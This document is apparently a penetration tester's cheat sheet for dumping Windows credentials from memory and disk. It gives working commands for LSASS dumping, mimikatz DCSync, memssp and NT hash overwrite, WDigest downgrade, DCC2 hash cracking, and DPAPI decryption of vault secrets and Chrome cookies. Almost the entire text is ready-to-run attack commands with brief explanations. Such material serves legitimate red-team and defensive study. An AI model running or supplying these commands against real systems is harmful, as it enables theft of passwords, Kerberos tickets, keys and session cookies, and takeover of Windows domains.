#Ways to dump credentials from memory
-Dumping LSASS from Task Manager
procdump.exe -accepteula -ma "lsass.exe" out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
sekurlsa::minidump c:\lsass.dmp
pypykatz lsa minidump lsass.DMP
#Enable WDigest so LSASS caches clear-text credentials (only applies to logons that happen after the change)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
lsadump::dcsync /user:dcorp\krbtgt
#Cached domain logons (DCC2 hashes). Pass-the-hash style attacks can't be performed with this hash type; it has to be cracked.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>
#Export private certificates
Invoke-Mimikatz -DumpCerts
#SSP attack (memssp): passwords from all subsequent logons are written in clear text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
#List plain-text creds [Risky]
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
#Find the GUID of the master key that protects the credential file
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
#Retrieve the master key needed to decrypt the credential file
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export
#Decrypt the target user's master key with the domain DPAPI backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
#Decrypt the master key with the user's clear-text password
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
#Without knowing the password, but with code execution, retrieve the master key from the DC over RPC
dpapi::masterkey /in:"%appdata\Microsoft\Protect\<SID>\<Master-key-GUID> /rpc
#Decrypt credentials from the Windows Vault using the master key
dpapi::creds /in:<creds> /masterkey:<masterkey> /unprotect